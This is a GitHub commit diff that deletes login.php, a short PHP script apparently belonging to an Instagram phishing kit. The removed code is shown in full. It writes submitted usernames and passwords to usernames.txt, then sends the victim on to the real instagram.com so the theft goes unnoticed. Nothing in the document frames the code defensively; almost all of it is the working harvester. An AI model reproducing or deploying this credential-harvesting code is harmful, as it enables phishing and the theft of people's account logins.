Delete login.php

This commit is contained in:
An0nUD4Y 2018-04-02 11:18:08 +05:30 committed by GitHub
parent efe3f3b18d
commit be3dba36fa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,15 +0,0 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://instagram.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>